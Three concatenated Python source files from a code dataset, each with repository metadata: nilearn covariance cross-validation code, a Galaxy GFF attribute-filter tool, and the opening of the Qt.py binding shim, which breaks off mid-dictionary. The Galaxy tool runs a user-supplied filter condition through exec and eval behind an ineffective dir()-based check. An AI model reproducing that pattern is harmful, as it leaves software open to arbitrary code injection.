if this_score >= .1 / np.finfo(np.float).eps:
this_score = np.nan
if np.isfinite(this_score):
last_finite_idx = index
if this_score >= best_score:
best_score = this_score
best_index = index
# Refine the grid
if best_index == 0:
# We do not need to go back: we have chosen
# the highest value of alpha for which there are
# non-zero coefficients
alpha_1 = path[0][0]
alpha_0 = path[1][0]
covs_init = path[0][2]
elif (best_index == last_finite_idx
and not best_index == len(path) - 1):
# We have non-converged models on the upper bound of the
# grid, we need to refine the grid there
alpha_1 = path[best_index][0]
alpha_0 = path[best_index + 1][0]
covs_init = path[best_index][2]
elif best_index == len(path) - 1:
alpha_1 = path[best_index][0]
alpha_0 = 0.01 * path[best_index][0]
covs_init = path[best_index][2]
else:
alpha_1 = path[best_index - 1][0]
alpha_0 = path[best_index + 1][0]
covs_init = path[best_index - 1][2]
alphas = np.logspace(np.log10(alpha_1), np.log10(alpha_0),
len(alphas) + 2)
alphas = alphas[1:-1]
if n_refinements > 1:
logger.log("[GroupSparseCovarianceCV] Done refinement "
"% 2i out of %i" % (i + 1, n_refinements),
verbose=self.verbose)
path = list(zip(*path))
cv_scores_ = list(path[1])
alphas = list(path[0])
self.cv_scores_ = np.array(cv_scores_)
self.alpha_ = alphas[best_index]
self.cv_alphas_ = alphas
# Finally, fit the model with the selected alpha
logger.log("Final optimization", verbose=self.verbose)
self.covariances_ = emp_covs
self.precisions_ = _group_sparse_covariance(
emp_covs, n_samples, self.alpha_, tol=self.tol,
max_iter=self.max_iter,
verbose=self.verbose, debug=self.debug)
return self
|
ainafp/nilearn
|
nilearn/group_sparse_covariance.py
|
Python
|
bsd-3-clause
| 42,396
|
[
"Gaussian"
] |
d5f419ade8853c3d05adf2de4b3e38d98b87d3f8ff38408884d2938d1355e819
|
#!/usr/bin/env python
# This tool takes a gff file as input and creates filters on attributes based on certain properties.
# The tool will skip over invalid lines within the file, informing the user about the number of lines skipped.
# TODO: much of this code is copied from the Filter1 tool (filtering.py in tools/stats/). The commonalities should be
# abstracted and leveraged in each filtering tool.
from __future__ import division
import sys
from galaxy import eggs
from galaxy.util.json import dumps, loads
# Older py compatibility
try:
set()
except:
from sets import Set as set
assert sys.version_info[:2] >= ( 2, 4 )
#
# Helper functions.
#
def get_operands( filter_condition ):
# Note that the order of all_operators is important
items_to_strip = ['+', '-', '**', '*', '//', '/', '%', '<<', '>>', '&', '|', '^', '~', '<=', '<', '>=', '>', '==', '!=', '<>', ' and ', ' or ', ' not ', ' is ', ' is not ', ' in ', ' not in ']
for item in items_to_strip:
if filter_condition.find( item ) >= 0:
filter_condition = filter_condition.replace( item, ' ' )
operands = set( filter_condition.split( ' ' ) )
return operands
def stop_err( msg ):
sys.stderr.write( msg )
sys.exit()
def check_for_executable( text, description='' ):
# Attempt to determine if the condition includes executable stuff and, if so, exit.
secured = dir()
operands = get_operands( text )
for operand in operands:
try:
check = int( operand )
except:
if operand in secured:
stop_err( "Illegal value '%s' in %s '%s'" % ( operand, description, text ) )
#
# Process inputs.
#
in_fname = sys.argv[1]
out_fname = sys.argv[2]
cond_text = sys.argv[3]
attribute_types = loads( sys.argv[4] )
# Convert types from str to type objects.
for name, a_type in attribute_types.items():
check_for_executable(a_type)
attribute_types[ name ] = eval( a_type )
# Unescape if input has been escaped
mapped_str = {
'__lt__': '<',
'__le__': '<=',
'__eq__': '==',
'__ne__': '!=',
'__gt__': '>',
'__ge__': '>=',
'__sq__': '\'',
'__dq__': '"',
}
for key, value in mapped_str.items():
cond_text = cond_text.replace( key, value )
# Attempt to determine if the condition includes executable stuff and, if so, exit.
check_for_executable( cond_text, 'condition')
# Prepare the column variable names and wrappers for column data types. Only
# prepare columns up to largest column in condition.
attrs, type_casts = [], []
for name, attr_type in attribute_types.items():
attrs.append( name )
type_cast = "get_value('%(name)s', attribute_types['%(name)s'], attribute_values)" % ( {'name': name} )
type_casts.append( type_cast )
attr_str = ', '.join( attrs ) # 'c1, c2, c3, c4'
type_cast_str = ', '.join( type_casts ) # 'str(c1), int(c2), int(c3), str(c4)'
wrap = "%s = %s" % ( attr_str, type_cast_str )
# Stats
skipped_lines = 0
first_invalid_line = 0
invalid_line = None
lines_kept = 0
total_lines = 0
out = open( out_fname, 'wt' )
# Helper function to safely get and type cast a value in a dict.
def get_value(name, a_type, values_dict):
if name in values_dict:
return (a_type)(values_dict[ name ])
else:
return None
# Read and filter input file, skipping invalid lines
code = '''
for i, line in enumerate( file( in_fname ) ):
total_lines += 1
line = line.rstrip( '\\r\\n' )
if not line or line.startswith( '#' ):
skipped_lines += 1
if not invalid_line:
first_invalid_line = i + 1
invalid_line = line
continue
try:
# Place attribute values into variables with attribute
# name; type casting is done as well.
elems = line.split( '\t' )
attribute_values = {}
for name_value_pair in elems[8].split(";"):
pair = name_value_pair.strip().split(" ")
if pair == '':
continue
name = pair[0].strip()
if name == '':
continue
# Need to strip double quote from value and typecast.
attribute_values[name] = pair[1].strip(" \\"")
%s
if %s:
lines_kept += 1
print >> out, line
except Exception, e:
print e
skipped_lines += 1
if not invalid_line:
first_invalid_line = i + 1
invalid_line = line
''' % ( wrap, cond_text )
valid_filter = True
try:
exec code
except Exception, e:
out.close()
if str( e ).startswith( 'invalid syntax' ):
valid_filter = False
stop_err( 'Filter condition "%s" likely invalid. See tool tips, syntax and examples.' % cond_text )
else:
stop_err( str( e ) )
if valid_filter:
out.close()
valid_lines = total_lines - skipped_lines
print 'Filtering with %s, ' % ( cond_text )
if valid_lines > 0:
print 'kept %4.2f%% of %d lines.' % ( 100.0*lines_kept/valid_lines, total_lines )
else:
print 'Possible invalid filter condition "%s" or non-existent column referenced. See tool tips, syntax and examples.' % cond_text
if skipped_lines > 0:
print 'Skipped %d invalid lines starting at line #%d: "%s"' % ( skipped_lines, first_invalid_line, invalid_line )
|
mikel-egana-aranguren/SADI-Galaxy-Docker
|
galaxy-dist/tools/filters/gff/gff_filter_by_attribute.py
|
Python
|
gpl-3.0
| 5,303
|
[
"Galaxy"
] |
8a5543d35ca0fcf119d7c375aa535093e7eb93746efc607cfbf8b20a6d7112aa
|
"""Minimal Python 2 & 3 shim around all Qt bindings
DOCUMENTATION
Qt.py was born in the film and visual effects industry to address
the growing need for the development of software capable of running
with more than one flavour of the Qt bindings for Python - PySide,
PySide2, PyQt4 and PyQt5.
1. Build for one, run with all
2. Explicit is better than implicit
3. Support co-existence
Default resolution order:
- PySide2
- PyQt5
- PySide
- PyQt4
Usage:
>> import sys
>> from Qt import QtWidgets
>> app = QtWidgets.QApplication(sys.argv)
>> button = QtWidgets.QPushButton("Hello World")
>> button.show()
>> app.exec_()
All members of PySide2 are mapped from other bindings, should they exist.
If no equivalent member exist, it is excluded from Qt.py and inaccessible.
The idea is to highlight members that exist across all supported binding,
and guarantee that code that runs on one binding runs on all others.
For more details, visit https://github.com/mottosso/Qt.py
LICENSE
See end of file for license (MIT, BSD) information.
"""
import os
import sys
import types
import shutil
import importlib
import json
__version__ = "1.3.5"
# Enable support for `from Qt import *`
__all__ = []
# Flags from environment variables
QT_VERBOSE = bool(os.getenv("QT_VERBOSE"))
QT_PREFERRED_BINDING_JSON = os.getenv("QT_PREFERRED_BINDING_JSON", "")
QT_PREFERRED_BINDING = os.getenv("QT_PREFERRED_BINDING", "")
QT_SIP_API_HINT = os.getenv("QT_SIP_API_HINT")
# Reference to Qt.py
Qt = sys.modules[__name__]
Qt.QtCompat = types.ModuleType("QtCompat")
try:
long
except NameError:
# Python 3 compatibility
long = int
"""Common members of all bindings
This is where each member of Qt.py is explicitly defined.
It is based on a "lowest common denominator" of all bindings;
including members found in each of the 4 bindings.
The "_common_members" dictionary is generated using the
build_membership.sh script.
"""
_common_members = {
"QtCore": [
"QAbstractAnimation",
"QAbstractEventDispatcher",
"QAbstractItemModel",
"QAbstractListModel",
"QAbstractState",
"QAbstractTableModel",
"QAbstractTransition",
"QAnimationGroup",
"QBasicTimer",
"QBitArray",
"QBuffer",
"QByteArray",
"QByteArrayMatcher",
"QChildEvent",
"QCoreApplication",
"QCryptographicHash",
"QDataStream",
"QDate",
"QDateTime",
"QDir",
"QDirIterator",
"QDynamicPropertyChangeEvent",
"QEasingCurve",
"QElapsedTimer",
"QEvent",
"QEventLoop",
"QEventTransition",
"QFile",
"QFileInfo",
"QFileSystemWatcher",
"QFinalState",
"QGenericArgument",
"QGenericReturnArgument",
"QHistoryState",
"QItemSelectionRange",
"QIODevice",
"QLibraryInfo",
"QLine",
"QLineF",
"QLocale",
"QMargins",
"QMetaClassInfo",
"QMetaEnum",
"QMetaMethod",
"QMetaObject",
"QMetaProperty",
"QMimeData",
"QModelIndex",
"QMutex",
"QMutexLocker",
"QObject",
"QParallelAnimationGroup",
"QPauseAnimation",
"QPersistentModelIndex",
"QPluginLoader",
"QPoint",
"QPointF",
"QProcess",
"QProcessEnvironment",
"QPropertyAnimation",
"QReadLocker",
"QReadWriteLock",
"QRect",
"QRectF",
"QRegExp",
"QResource",
"QRunnable",
"QSemaphore",
"QSequentialAnimationGroup",
"QSettings",
"QSignalMapper",
"QSignalTransition",
"QSize",
"QSizeF",
"QSocketNotifier",
"QState",
"QStateMachine",
"QSysInfo",
"QSystemSemaphore",
"QT_TRANSLATE_NOOP",
"QT_TR_NOOP",
"QT_TR_NOOP_UTF8",
"QTemporaryFile",
"QTextBoundaryFinder",
"QTextCodec",
"QTextDecoder",
"QTextEncoder",
"QTextStream",
"QTextStreamManipulator",
"QThread",
"QThreadPool",
"QTime",
"QTimeLine",
"QTimer",
"QTimerEvent",
"QTranslator",
"QUrl",
"QVariantAnimation",
"QWaitCondition",
"QWriteLocker",
"QXmlStreamAttribute",
"QXmlStreamAttributes",
"QXmlStreamEntityDeclaration",
"QXmlStreamEntityResolver",
"QXmlStreamNamespaceDeclaration",
"QXmlStreamNotationDeclaration",
"QXmlStreamReader",
"QXmlStreamWriter",
"Qt",
"QtCriticalMsg",
"QtDebugMsg",
"QtFatalMsg",
"QtMsgType",
"QtSystemMsg",
"QtWarningMsg",
"qAbs",
"qAddPostRoutine",
"qChecksum",
"qCritical",
"qDebug",
"qFatal",
"qFuzzyCompare",
"qIsFinite",
"qIsInf",
"qIsNaN",
"qIsNull",
"qRegisterResourceData",
"qUnregisterResourceData",
"qVersion",
"qWarning",
"qrand",
"qsrand",
],
"QtGui": [
"QAbstractTextDocumentLayout",
"QActionEvent",
"QBitmap",
"QBrush",
"QClipboard",
"QCloseEvent",
"QColor",
"QConicalGradient",
"QContextMenuEvent",
"QCursor",
"QDesktopServices",
"QDoubleValidator",
"QDrag",
"QDragEnterEvent",
"QDragLeaveEvent",
"QDragMoveEvent",
"QDropEvent",
"QFileOpenEvent",
"QFocusEvent",
"QFont",
"QFontDatabase",
"QFontInfo",
"QFontMetrics",
"QFontMetricsF",
"QGradient",
"QHelpEvent",
"QHideEvent",
"QHoverEvent",
"QIcon",
"QIconDragEvent",
"QIconEngine",
"QImage",
"QImageIOHandler",
"QImageReader",
"QImageWriter",
"QInputEvent",
"QInputMethodEvent",
"QIntValidator",
"QKeyEvent",
"QKeySequence",
"QLinearGradient",
"QMatrix2x2",
"QMatrix2x3",
"QMatrix2x4",
"QMatrix3x2",
"QMatrix3x3",
"QMatrix3x4",
"QMatrix4x2",
"QMatrix4x3",
"QMatrix4x4",
"QMouseEvent",
"QMoveEvent",
"QMovie",
"QPaintDevice",
"QPaintEngine",
"QPaintEngineState",
"QPaintEvent",
"QPainter",
"QPainterPath",
"QPainterPathStroker",
"QPalette",
"QPen",
"QPicture",
"QPictureIO",
"QPixmap",
"QPixmapCache",
"QPolygon",
"QPolygonF",
"QQuaternion",
"QRadialGradient",
"QRegExpValidator",
"QRegion",
"QResizeEvent",
"QSessionManager",
"QShortcutEvent",
"QShowEvent",
"QStandardItem",
"QStandardItemModel",
"QStatusTipEvent",
"QSyntaxHighlighter",
"QTabletEvent",
"QTextBlock",
"QTextBlockFormat",
"QTextBlockGroup",
"QTextBlockUserData",
"QTextCharFormat",
"QTextCursor",
"QTextDocument",
"QTextDocumentFragment",
"QTextFormat",
"QTextFragment",
"QTextFrame",
"QTextFrameFormat",
"QTextImageFormat",
"QTextInlineObject",
"QTextItem",
"QTextLayout",
"QTextLength",
"QTextLine",
"QTextList",
"QTextListFormat",
"QTextObject",
"QTextObjectInterface",
"QTextOption",
"QTextTable",
"QTextTableCell",
"QTextTableCellFormat",
"QTextTableFormat",
"QTouchEvent",
"QTransform",
"QValidator",
"QVector2D",
"QVector3D",
"QVector4D",
"QWhatsThisClickedEvent",
"QWheelEvent",
"QWindowStateChangeEvent",
"qAlpha",
"qBlue",
"qGray",
"qGreen",
"qIsGray",
"qRed",
"qRgb",
"qRgba",
],
"QtHelp": [
"QHelpContentItem",
"QHelpContentModel",
"QHelpContentWidget",
"QHelpEngine",
"QHelpEngineCore",
"QHelpIndexModel",
"QHelpIndexWidget",
"QHelpSearchEngine",
"QHelpSearchQuery",
"QHelpSearchQueryWidget",
"QHelpSearchResultWidget",
],
"QtMultimedia": [
"QAbstractVideoBuffer",
"QAbstractVideoSurface",
"QAudio",
"QAudioDeviceInfo",
"QAudioFormat",
"QAudioInput",
"QAudioOutput",
"QVideoFrame",
"QVideoSurfaceFormat",
],
"QtNetwork": [
"QAbstractNetworkCache",
"QAbstractSocket",
"QAuthenticator",
"QHostAddress",
"QHostInfo",
"QLocalServer",
"QLocalSocket",
"QNetworkAccessManager",
"QNetworkAddressEntry",
"QNetworkCacheMetaData",
"QNetworkConfiguration",
"QNetworkConfigurationManager",
"QNetworkCookie",
"QNetworkCookieJar",
"QNetworkDiskCache",
"QNetworkInterface",
"QNetworkProxy",
"QNetworkProxyFactory",
"QNetworkProxyQuery",
"QNetworkReply",
"QNetworkRequest",
"QNetworkSession",
"QSsl",
"QTcpServer",
"QTcpSocket",
"QUdpSocket",
],
"QtOpenGL": ["QGL", "QGLContext", "QGLFormat", "QGLWidget"],
"QtPrintSupport": [
"QAbstractPrintDialog",
"QPageSetupDialog",
"QPrintDialog",
"QPrintEngine",
"QPrintPreviewDialog",
"QPrintPreviewWidget",
"QPrinter",
"QPrinterInfo",
],
"QtSql": [
"QSql",
"QSqlDatabase",
"QSqlDriver",
"QSqlDriverCreatorBase",
"QSqlError",
"QSqlField",
"QSqlIndex",
"QSqlQuery",
"QSqlQueryModel",
"QSqlRecord",
"QSqlRelation",
"QSqlRelationalDelegate",
"QSqlRelationalTableModel",
"QSqlResult",
"QSqlTableModel",
],
"QtSvg": ["QGraphicsSvgItem", "QSvgGenerator", "QSvgRenderer", "QSvgWidget"],
"QtTest": ["QTest"],
"QtWidgets": [
"QAbstractButton",
"QAbstractGraphicsShapeItem",
"QAbstractItemDelegate",
"QAbstractItemView",
"QAbstractScrollArea",
"QAbstractSlider",
"QAbstractSpinBox",
"QAction",
"QActionGroup",
"QApplication",
"QBoxLayout",
"QButtonGroup",
"QCalendarWidget",
"QCheckBox",
"QColorDialog",
"QColumnView",
"QComboBox",
"QCommandLinkButton",
"QCommonStyle",
"QCompleter",
"QDataWidgetMapper",
"QDateEdit",
"QDateTimeEdit",
"QDesktopWidget",
"QDial",
"QDialog",
"QDialogButtonBox",
"QDirModel",
"QDockWidget",
"QDoubleSpinBox",
"QErrorMessage",
"QFileDialog",
"QFileIconProvider",
"QFileSystemModel",
"QFocusFrame",
"QFontComboBox",
"QFontDialog",
"QFormLayout",
"QFrame",
"QGesture",
"QGestureEvent",
"QGestureRecognizer",
"QGraphicsAnchor",
"QGraphicsAnchorLayout",
"QGraphicsBlurEffect",
"QGraphicsColorizeEffect",
"QGraphicsDropShadowEffect",
"QGraphicsEffect",
"QGraphicsEllipseItem",
"QGraphicsGridLayout",
"QGraphicsItem",
"QGraphicsItemGroup",
"QGraphicsLayout",
"QGraphicsLayoutItem",
"QGraphicsLineItem",
"QGraphicsLinearLayout",
"QGraphicsObject",
"QGraphicsOpacityEffect",
"QGraphicsPathItem",
"QGraphicsPixmapItem",
"QGraphicsPolygonItem",
"QGraphicsProxyWidget",
"QGraphicsRectItem",
"QGraphicsRotation",
"QGraphicsScale",
"QGraphicsScene",
"QGraphicsSceneContextMenuEvent",
"QGraphicsSceneDragDropEvent",
"QGraphicsSceneEvent",
"QGraphicsSceneHelpEvent",
"QGraphicsSceneHoverEvent",
"QGraphicsSceneMouseEvent",
"QGraphicsSceneMoveEvent",
"QGraphicsSceneResizeEvent",
"QGraphicsSceneWheelEvent",
"QGraphicsSimpleTextItem",
"QGraphicsTextItem",
"QGraphicsTransform",
"QGraphicsView",
"QGraphicsWidget",
"QGridLayout",
"QGroupBox",
"QHBoxLayout",
"QHeaderView",
"QInputDialog",
"QItemDelegate",
"QItemEditorCreatorBase",
"QItemEditorFactory",
"QKeyEventTransition",
"QLCDNumber",
"QLabel",
"QLayout",
"QLayoutItem",
"QLineEdit",
"QListView",
"QListWidget",
"QListWidgetItem",
"QMainWindow",
"QMdiArea",
"QMdiSubWindow",
"QMenu",
"QMenuBar",
"QMessageBox",
"QMouseEventTransition",
"QPanGesture",
"QPinchGesture",
"QPlainTextDocumentLayout",
"QPlainTextEdit",
"QProgressBar",
"QProgressDialog",
"QPushButton",
"QRadioButton",
"QRubberBand",
"QScrollArea",
"QScrollBar",
"QShortcut",
"QSizeGrip",
"QSizePolicy",
"QSlider",
"QSpacerItem",
"QSpinBox",
"QSplashScreen",
"QSplitter",
"QSplitterHandle",
"QStackedLayout",
"QStackedWidget",
"QStatusBar",
"QStyle",
"QStyleFactory",
"QStyleHintReturn",
"QStyleHintReturnMask",
"QStyleHintReturnVariant",
"QStyleOption",
"QStyleOptionButton",
"QStyleOptionComboBox",
"QStyleOptionComplex",
"QStyleOptionDockWidget",
"QStyleOptionFocusRect",
"QStyleOptionFrame",
"QStyleOptionGraphicsItem",
"QStyleOptionGroupBox",
"QStyleOptionHeader",
"QStyleOptionMenuItem",
"QStyleOptionProgressBar",
"QStyleOptionRubberBand",
"QStyleOptionSizeGrip",
"QStyleOptionSlider",
"QStyleOptionSpinBox",
"QStyleOptionTab",
"QStyleOptionTabBarBase",
"QStyleOptionTabWidgetFrame",
"QStyleOptionTitleBar",
"QStyleOptionToolBar",
"QStyleOptionToolBox",
"QStyleOptionToolButton",
"QStyleOptionViewItem",
"QStylePainter",
"QStyledItemDelegate",
"QSwipeGesture",
"QSystemTrayIcon",
"QTabBar",
"QTabWidget",
"QTableView",
"QTableWidget",
"QTableWidgetItem",
"QTableWidgetSelectionRange",
"QTapAndHoldGesture",
"QTapGesture",
"QTextBrowser",
"QTextEdit",
"QTimeEdit",
"QToolBar",
"QToolBox",
"QToolButton",
"QToolTip",
"QTreeView",
"QTreeWidget",
"QTreeWidgetItem",
"QTreeWidgetItemIterator",
"QUndoCommand",
"QUndoGroup",
"QUndoStack",
"QUndoView",
"QVBoxLayout",
"QWhatsThis",
"QWidget",
"QWidgetAction",
"QWidgetItem",
"QWizard",
"QWizardPage",
],
"QtX11Extras": ["QX11Info"],
"QtXml": [
"QDomAttr",
"QDomCDATASection",
"QDomCharacterData",
"QDomComment",
"QDomDocument",
"QDomDocumentFragment",
"QDomDocumentType",
"QDomElement",
"QDomEntity",
"QDomEntityReference",
"QDomImplementation",
"QDomNamedNodeMap",
"QDomNode",
"QDomNodeList",
"QDomNotation",
"QDomProcessingInstruction",
"QDomText",
"QXmlAttributes",
"QXmlContentHandler",
"QXmlDTDHandler",
"QXmlDeclHandler",
"QXmlDefaultHandler",
"QXmlEntityResolver",
"QXmlErrorHandler",
"QXmlInputSource",
"QXmlLexicalHandler",
"QXmlLocator",
"QXmlNamespaceSupport",
"QXmlParseException",
"QXmlReader",
"QXmlSimpleReader",
],
"QtXmlPatterns": [
"QAbstractMessageHandler",
"QAbstractUriResolver",
"QAbstractXmlNodeModel",
"QAbstractXmlReceiver",
"QSourceLocation",
"QXmlFormatter",
"QXmlItem",
"QXmlName",
"QXmlNamePool",
"QXmlNodeModelIndex",
"QXmlQuery",
"QXmlResultItems",
"QXmlSchema",
"QXmlSchemaValidator",
"QXmlSerializer",
],
}
""" Missing members
This mapping describes members that have been deprecated
in one or more bindings and have been left out of the
_common_members mapping.
The member can provide an extra details string to be
included in exceptions and warnings.
"""
_missing_members = {
"QtGui": {
"QMatrix": "Deprecated in PyQt5",
},
}
def _qInstallMessageHandler(handler):
"""Install a message handler that works in all bindings
Args:
handler: A function that takes 3 arguments, or None
"""
def messageOutputHandler(*args):
# In Qt4 bindings, message handlers are passed 2 arguments
# In Qt5 bindings, message handlers are passed 3 arguments
# The first argument is a QtMsgType
# The last argument is the message to be printed
# The Middle argument (if passed) is a QMessageLogContext
if len(args) == 3:
msgType, logContext, msg = args
elif len(args) == 2:
msgType, msg = args
logContext = None
else:
raise TypeError(
"handler expected 2 or 3 arguments, got {0}".format(len(args))
)
if isinstance(msg, bytes):
# In python 3, some bindings pass a bytestring, which cannot be
# used elsewhere. Decoding a python 2 or 3 bytestring object will
# consistently return a unicode object.
msg = msg.decode()
handler(msgType, logContext, msg)
passObject = messageOutputHandler if handler else handler
if Qt.IsPySide or Qt.IsPyQt4:
return Qt._QtCore.qInstallMsgHandler(passObject)
elif Qt.IsPySide2 or Qt.IsPyQt5:
return Qt._QtCore.qInstallMessageHandler(passObject)
def _getcpppointer(object):
if hasattr(Qt, "_shiboken2"):
return getattr(Qt, "_shiboken2").getCppPointer(object)[0]
elif hasattr(Qt, "_shiboken"):
return getattr(Qt, "_shiboken").getCppPointer(object)[0]
elif hasattr(Qt, "_sip"):
return getattr(Qt, "_sip").unwrapinstance(object)
raise AttributeError("'module' has no attribute 'getCppPointer'")
def _wrapinstance(ptr, base=None):
"""Enable implicit cast of pointer to most suitable class
This behaviour is available in sip per default.
Based on http://nathanhorne.com/pyqtpyside-wrap-instance
Usage:
This mechanism kicks in under these circumstances.
1. Qt.py is using PySide 1 or 2.
2. A `base` argument is not provided.
See :func:`QtCompat.wrapInstance()`
Arguments:
ptr (long): Pointer to QObject in memory
base (QObject, optional): Base class to wrap with. Defaults to QObject,
which should handle anything.
"""
assert isinstance(ptr, long), "Argument 'ptr' must be of type <long>"
assert (base is None) or issubclass(
base, Qt.QtCore.QObject
), "Argument 'base' must be of type <QObject>"
if Qt.IsPyQt4 or Qt.IsPyQt5:
func = getattr(Qt, "_sip").wrapinstance
elif Qt.IsPySide2:
func = getattr(Qt, "_shiboken2").wrapInstance
elif Qt.IsPySide:
func = getattr(Qt, "_shiboken").wrapInstance
else:
raise AttributeError("'module' has no attribute 'wrapInstance'")
if base is None:
if Qt.IsPyQt4 or Qt.IsPyQt5:
base = Qt.QtCore.QObject
else:
q_object = func(long(ptr), Qt.QtCore.QObject)
meta_object = q_object.metaObject()
while True:
class_name = meta_object.className()
try:
base = getattr(Qt.QtWidgets, class_name)
except AttributeError:
try:
base = getattr(Qt.QtCore, class_name)
except AttributeError:
meta_object = meta_object.superClass()
continue
break
return func(long(ptr), base)
def _isvalid(object):
"""Check if the object is valid to use in Python runtime.
Usage:
See :func:`QtCompat.isValid()`
Arguments:
object (QObject): QObject to check the validity of.
"""
assert isinstance(object, Qt.QtCore.QObject)
if hasattr(Qt, "_shiboken2"):
return getattr(Qt, "_shiboken2").isValid(object)
elif hasattr(Qt, "_shiboken"):
return getattr(Qt, "_shiboken").isValid(object)
elif hasattr(Qt, "_sip"):
return not getattr(Qt, "_sip").isdeleted(object)
else:
raise AttributeError("'module' has no attribute isValid")
def _translate(context, sourceText, *args):
# In Qt4 bindings, translate can be passed 2 or 3 arguments
# In Qt5 bindings, translate can be passed 2 arguments
# The first argument is disambiguation[str]
# The last argument is n[int]
# The middle argument can be encoding[QtCore.QCoreApplication.Encoding]
if len(args) == 3:
disambiguation, encoding, n = args
elif len(args) == 2:
disambiguation, n = args
encoding = None
else:
raise TypeError("Expected 4 or 5 arguments, got {0}.".format(len(args) + 2))
if hasattr(Qt.QtCore, "QCoreApplication"):
app = getattr(Qt.QtCore, "QCoreApplication")
else:
raise NotImplementedError(
"Missing QCoreApplication implementation for {binding}".format(
binding=Qt.__binding__,
)
)
if Qt.__binding__ in ("PySide2", "PyQt5"):
sanitized_args = [context, sourceText, disambiguation, n]
else:
sanitized_args = [
context,
sourceText,
disambiguation,
encoding or app.CodecForTr,
n,
]
return app.translate(*sanitized_args)
def _loadUi(uifile, baseinstance=None):
"""Dynamically load a user interface from the given `uifile`
This function calls `uic.loadUi` if using PyQt bindings,
else it implements a comparable binding for PySide.
Documentation:
http://pyqt.sourceforge.net/Docs/PyQt5/designer.html#PyQt5.uic.loadUi
Arguments:
uifile (str): Absolute path to Qt Designer file.
baseinstance (QWidget): Instantiated QWidget or subclass thereof
Return:
baseinstance if `baseinstance` is not `None`. Otherwise
return the newly created instance of the user interface.
"""
if hasattr(Qt, "_uic"):
return Qt._uic.loadUi(uifile, baseinstance)
elif hasattr(Qt, "_QtUiTools"):
# Implement `PyQt5.uic.loadUi` for PySide(2)
class _UiLoader(Qt._QtUiTools.QUiLoader):
"""Create the user interface in a base instance.
Unlike `Qt._QtUiTools.QUiLoader` itself this class does not
create a new instance of the top-level widget, but creates the user
interface in an existing instance of the top-level class if needed.
This mimics the behaviour of `PyQt5.uic.loadUi`.
"""
def __init__(self, baseinstance):
super(_UiLoader, self).__init__(baseinstance)
self.baseinstance = baseinstance
self.custom_widgets = {}
def _loadCustomWidgets(self, etree):
"""
Workaround to pyside-77 bug.
From QUiLoader doc we should use registerCustomWidget method.
But this causes a segfault on some platforms.
Instead we fetch from customwidgets DOM node the python class
objects. Then we can directly use them in createWidget method.
"""
def headerToModule(header):
"""
Translate a header file to python module path
foo/bar.h => foo.bar
"""
# Remove header extension
module = os.path.splitext(header)[0]
# Replace os separator by python module separator
return module.replace("/", ".").replace("\\", ".")
custom_widgets = etree.find("customwidgets")
if custom_widgets is None:
return
for custom_widget in custom_widgets:
class_name = custom_widget.find("class").text
header = custom_widget.find("header").text
module = importlib.import_module(headerToModule(header))
self.custom_widgets[class_name] = getattr(module, class_name)
def load(self, uifile, *args, **kwargs):
from xml.etree.ElementTree import ElementTree
# For whatever reason, if this doesn't happen then
# reading an invalid or non-existing .ui file throws
# a RuntimeError.
etree = ElementTree()
etree.parse(uifile)
self._loadCustomWidgets(etree)
widget = Qt._QtUiTools.QUiLoader.load(self, uifile, *args, **kwargs)
# Workaround for PySide 1.0.9, see issue #208
widget.parentWidget()
return widget
def createWidget(self, class_name, parent=None, name=""):
"""Called for each widget defined in ui file
Overridden here to populate `baseinstance` instead.
"""
if parent is None and self.baseinstance:
# Supposed to create the top-level widget,
# return the base instance instead
return self.baseinstance
# For some reason, Line is not in the list of available
# widgets, but works fine, so we have to special case it here.
if class_name in self.availableWidgets() + ["Line"]:
# Create a new widget for child widgets
widget = Qt._QtUiTools.QUiLoader.createWidget(
self, class_name, parent, name
)
elif class_name in self.custom_widgets:
widget = self.custom_widgets[class_name](parent=parent)
else:
raise Exception("Custom widget '%s' not supported" % class_name)
if self.baseinstance:
# Set an attribute for the new child widget on the base
# instance, just like PyQt5.uic.loadUi does.
setattr(self.baseinstance, name, widget)
return widget
widget = _UiLoader(baseinstance).load(uifile)
Qt.QtCore.QMetaObject.connectSlotsByName(widget)
return widget
else:
raise NotImplementedError("No implementation available for loadUi")
"""Misplaced members
These members from the original submodule are misplaced relative PySide2
"""
_misplaced_members = {
"PySide2": {
"QtCore.QStringListModel": "QtCore.QStringListModel",
"QtGui.QStringListModel": "QtCore.QStringListModel",
"QtCore.Property": "QtCore.Property",
"QtCore.Signal": "QtCore.Signal",
"QtCore.Slot": "QtCore.Slot",
"QtCore.QAbstractProxyModel": "QtCore.QAbstractProxyModel",
"QtCore.QSortFilterProxyModel": "QtCore.QSortFilterProxyModel",
"QtCore.QItemSelection": "QtCore.QItemSelection",
"QtCore.QItemSelectionModel": "QtCore.QItemSelectionModel",
"QtCore.QItemSelectionRange": "QtCore.QItemSelectionRange",
"QtUiTools.QUiLoader": ["QtCompat.loadUi", _loadUi],
"shiboken2.wrapInstance": ["QtCompat.wrapInstance", _wrapinstance],
"shiboken2.getCppPointer": ["QtCompat.getCppPointer", _getcpppointer],
"shiboken2.isValid": ["QtCompat.isValid", _isvalid],
"QtWidgets.qApp": "QtWidgets.QApplication.instance()",
"QtCore.QCoreApplication.translate": ["QtCompat.translate", _translate],
"QtWidgets.QApplication.translate": ["QtCompat.translate", _translate],
"QtCore.qInstallMessageHandler": [
"QtCompat.qInstallMessageHandler",
_qInstallMessageHandler,
],
"QtWidgets.QStyleOptionViewItem": "QtCompat.QStyleOptionViewItemV4",
},
"PyQt5": {
"QtCore.pyqtProperty": "QtCore.Property",
"QtCore.pyqtSignal": "QtCore.Signal",
"QtCore.pyqtSlot": "QtCore.Slot",
"QtCore.QAbstractProxyModel": "QtCore.QAbstractProxyModel",
"QtCore.QSortFilterProxyModel": "QtCore.QSortFilterProxyModel",
"QtCore.QStringListModel": "QtCore.QStringListModel",
"QtCore.QItemSelection": "QtCore.QItemSelection",
"QtCore.QItemSelectionModel": "QtCore.QItemSelectionModel",
"QtCore.QItemSelectionRange": "QtCore.QItemSelectionRange",
"uic.loadUi": ["QtCompat.loadUi", _loadUi],
"sip.wrapinstance": ["QtCompat.wrapInstance", _wrapinstance],
"sip.unwrapinstance": ["QtCompat.getCppPointer", _getcpppointer],
"sip.isdeleted": ["QtCompat.isValid", _isvalid],
"QtWidgets.qApp": "QtWidgets.QApplication.instance()",
"QtCore.QCoreApplication.translate": ["QtCompat.translate", _translate],
"QtWidgets.QApplication.translate": ["QtCompat.translate", _translate],
"QtCore.qInstallMessageHandler": [
"QtCompat.qInstallMessageHandler",
_qInstallMessageHandler,
],
"QtWidgets.QStyleOptionViewItem": "QtCompat.QStyleOptionViewItemV4",
},
"PySide": {
